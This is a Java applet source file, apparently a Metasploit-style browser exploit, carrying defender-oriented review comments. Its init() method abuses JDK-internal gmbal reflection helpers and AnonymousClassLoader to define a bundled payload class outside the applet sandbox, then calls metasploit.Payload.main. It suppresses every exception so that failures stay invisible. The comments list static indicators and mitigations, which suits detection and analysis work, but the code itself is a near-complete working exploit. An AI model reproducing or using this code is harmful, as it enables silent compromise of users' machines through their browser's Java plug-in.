// NOTE(review): PrintStream, Serializable, IOException, ObjectInputStream and
// ObjectOutputStream are imported but not referenced anywhere in this listing.
import java.applet.Applet;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Method;
// The two gmbal imports are JDK-internal helper classes (com.sun.* namespace),
// not public API. A reference to this package from an applet JAR is a useful
// static-scan signal.
import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
import com.sun.org.glassfish.gmbal.util.GenericConstructor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
// Second-stage class; its source is not part of this listing.
import metasploit.Payload;
//import java.lang.Runtime;

/**
 * Applet whose {@link #init()} defines a bundled class file through JDK-internal
 * reflection helpers rather than through the applet's own class loader, and then
 * calls {@code metasploit.Payload.main}.
 *
 * <p>Reviewer notes, read from a defender's side:
 * <ul>
 *   <li>{@code init()} is the applet lifecycle callback, so the whole chain runs
 *       as soon as the applet container initialises the applet.</li>
 *   <li>Static indicators visible in this listing: the resource name
 *       {@code MyPayload.class}, the string constant
 *       {@code sun.invoke.anon.AnonymousClassLoader}, references to
 *       {@code com.sun.org.glassfish.gmbal.*}, and the class names
 *       {@code Exploit} and {@code metasploit.Payload}.</li>
 *   <li>NOTE(review): the runtime control that normally keeps untrusted code away
 *       from internal packages is the restricted-package list
 *       ({@code package.access} in the {@code java.security} file). Whether a
 *       given JRE lists the packages used here has to be checked against the
 *       vendor advisory; this page does not state affected versions. Removing or
 *       disabling the browser Java plug-in removes the applet entry point.</li>
 * </ul>
 */
public class Exploit extends Applet
{

    /** No-argument constructor; performs no work. */
    public Exploit()
    {
    }

    /**
     * Decodes a hexadecimal string into bytes, two characters per byte.
     *
     * <p>The output length is {@code str.length() / 2}, so a trailing unpaired
     * character is ignored. Nothing in this listing calls this method.
     *
     * @param str hexadecimal text, read in consecutive two-character pairs
     * @return the decoded bytes
     * @throws NumberFormatException if a pair is not valid base-16 input for
     *         {@link Integer#parseInt(String, int)}
     */
    public byte[] hex2Byte(String str)
    {
        byte[] bytes = new byte[str.length() / 2];
        for (int i = 0; i < bytes.length; i++)
        {
            // Values 0x80-0xFF wrap to negative bytes through the cast.
            bytes[i] = (byte) Integer
                    .parseInt(str.substring(2 * i, 2 * i + 2), 16);
        }
        return bytes;
    }

    /**
     * Applet entry point. In order, it:
     * <ol>
     *   <li>reads the bundled resource {@code MyPayload.class} into a byte array;</li>
     *   <li>asks {@code GenericConstructor} to instantiate
     *       {@code sun.invoke.anon.AnonymousClassLoader}, named by string;</li>
     *   <li>asks {@code ManagedObjectManagerFactory.getMethod} for that object's
     *       {@code loadClass(byte[])} method;</li>
     *   <li>invokes it on the bytes from step 1 and instantiates the returned class;</li>
     *   <li>calls {@code Payload.main(null)}.</li>
     * </ol>
     *
     * <p>NOTE(review): presumably the reason for routing steps 2 and 3 through the
     * gmbal helpers is that the reflective lookups then execute inside JDK code
     * rather than in the applet's own frames, and that a class defined in step 4
     * does not carry the applet's restricted protection domain. Confirm against
     * the vendor advisory before relying on this description.
     *
     * <p>Every exception is caught and discarded, so a runtime that blocks any of
     * these calls produces no console output or other visible failure from this
     * code.
     */
    public void init()
    {
        try
        {
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            byte[] buffer = new byte[8192];
            int length;

            // read in the class file from the jar
            // (the contents of MyPayload.class are not shown on this page; the stream is never closed)
            InputStream is = getClass().getResourceAsStream("MyPayload.class");
            // and write it out to the byte array stream
            while( ( length = is.read( buffer ) ) > 0 )
                bos.write( buffer, 0, length );
            // convert it to a simple byte array
            // (buffer is reused: from here on it holds the complete class file, not the 8 KiB scratch space)
            buffer = bos.toByteArray();

            // The target class is named by a string and the parameter-type array is
            // empty, so the applet itself never references the sun.invoke.anon type.
            GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
            Object obj = genericconstructor.create(new Object[] {});
            // Method lookup is likewise delegated to the internal factory class
            // instead of calling Class.getMethod from applet code.
            Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
            // Defines a class from the raw bytes read above; the result is cast to a raw Class.
            Class class1 = (Class)method.invoke(obj, new Object[] {
                //byte_payload
                buffer
            });
            // Instantiation runs the loaded class's static initialiser and no-arg constructor.
            class1.newInstance();
            // The two disabled lines below are the author's debugging aids.
            // NOTE(review): the first suggests the loaded class is expected to change the
            // installed SecurityManager; that cannot be confirmed from this page.
            //System.out.println("SecurityManager:" + System.getSecurityManager());
            //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
            // Hands control to metasploit.Payload, whose code is outside this listing.
            Payload.main(null);
            // Disabled test line left by the author.
            //Runtime.getRuntime().exec("calc.exe");
        }
        catch(Exception exception)
        {
            // Deliberately silent: SecurityException is a subclass of Exception, so a
            // denial by the runtime is swallowed here along with every other failure.
            //exception.printStackTrace();
        }
    }
}